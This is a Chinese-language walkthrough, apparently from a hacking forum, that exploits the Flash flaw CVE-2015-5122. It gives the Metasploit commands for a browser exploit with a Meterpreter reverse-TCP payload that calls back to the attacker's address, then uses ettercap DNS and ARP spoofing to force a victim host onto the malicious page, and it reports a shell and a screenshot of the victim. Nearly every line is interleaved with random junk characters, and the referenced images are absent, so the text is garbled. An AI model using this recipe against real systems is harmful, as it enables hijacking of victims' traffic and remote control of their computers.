|
; V8 }1 m( p. c* E" b% d
二、cve2015-5122漏洞实例演示虚拟机 # Z) ?* A T6 X% A! n4 e
8 M2 N+ ^3 I: I. q; f! W' \2 V
) Y/ j7 m' [' _! q4 R8 Q& \3 }
关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015年flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图:
; v% V8 K+ F7 K0 [" Y( E& e 8 W* x, q, |7 {2 S7 N; w1 H& R
+ _& P0 \ t2 ~3 ]. z
search cve-2015-5122如图: + g) v4 |8 h- j' q- x9 ]9 X* I
7 l z1 V1 l4 Z# i" f7 h
1 Q6 `$ D% Q3 j2 m7 b6 D / g0 m3 @4 M, M% T
; K$ @3 t( S2 p* r. K
4 h h& r e" ]' R 下面我们敲如下命令:
6 Q# x/ ]- }& D! g) ` 6 ]) H& |+ f; b4 i0 ^% ?& p' ?
6 c7 ?, c+ r8 y6 L9 P% W8 T use exploit/multi/browser/adobe_flash_opaque_background_uaf
: o1 N7 I* F# o & q! _, N1 Q" S$ b+ G( G v
$ x O _1 u" d" _ set PAYLOAD windows/meterpreter/reverse_tcp 1 E; ]/ \5 u) U# ^
2 _) o* N1 Y6 c7 x& k+ O: M! L* u
1 n; ~; {' l' K% {. a7 H7 V4 X* k
set LHOST 192.168.0.109
, K' C# V6 Q- R' A: J
$ E0 c4 K0 G% e |7 t) g9 I( G( `6 y! k) w
set URIPATH / /*根目录*/ 4 v$ X( T) [( ^3 b
9 O0 s: s" C8 J4 B8 Z2 r9 H+ |
o: ]$ U" n3 o; S set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址 ' ^# Z- Q9 {0 u$ L+ r
9 M# `# T; w' a' b0 t2 [
4 l& I' W3 K$ H( m+ [4 t set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 + n/ ]! @7 j0 Y, m
/ z& I/ r i; e4 f3 g( B$ L* m4 K M2 A# m( \! k/ O% N" O
然后show options如图: ( d! \2 p. p2 [! n
, l; b; O" q( f# e' C) I t6 L
) Q; S7 I* P7 [: q
- |6 E, Z& A. E; ?- K
# G8 J! ]3 I% i. q1 g' L- W! j: T$ y: j, e' J4 b
一切都设置好了,执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图: , J1 V: E a* t* o
9 E- _5 F: l# G# \) M$ p% o) S
6 |; Q" G4 v8 A9 y& D0 k4 }3 `7 g5 E0 ?' W* W) b V& b/ O+ i- t
然后ettercap -G命令打开ettercap,我们要攻击的主机ip是192.168.0。115 7 j |, @' V3 _) U( }2 S+ g" Z
, t. [& G" o! C2 _6 Y
8 L, U2 F2 t U
Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf
% W' u! N: G7 q, ?1 {) _ 7 D. _5 s1 \% U7 {+ c; x# x
; q Z/ \2 i4 A, Z0 C3 O1 q$ X
; l3 A, f( }( a
$ ?' P& E( h3 o4 V
* O% m# g |/ a7 k3 J 成功了,这时候我们断开ettercap,如图:
6 d c0 M3 v- R) v* Y& z
, d% ^5 D7 [1 u# y
) L& w1 Q9 E6 x
) O. m5 S4 T! H! V ' W! a6 p( J1 O+ v; h& z
+ I+ ]& [5 y, p
Screenshot如图:
0 Q5 v* f/ a! O* Q j5 H5 @ & v% _" l1 k/ Z9 ]* [9 i- i
( P, ]0 [+ A3 e# G- w8 i: w. H/ T 4 d. Y& }4 o2 P/ O e3 O
. w. Y+ y7 w9 p
. I+ t- [9 N1 s, Z- n# b, V + f+ p+ j- O4 Q7 V
|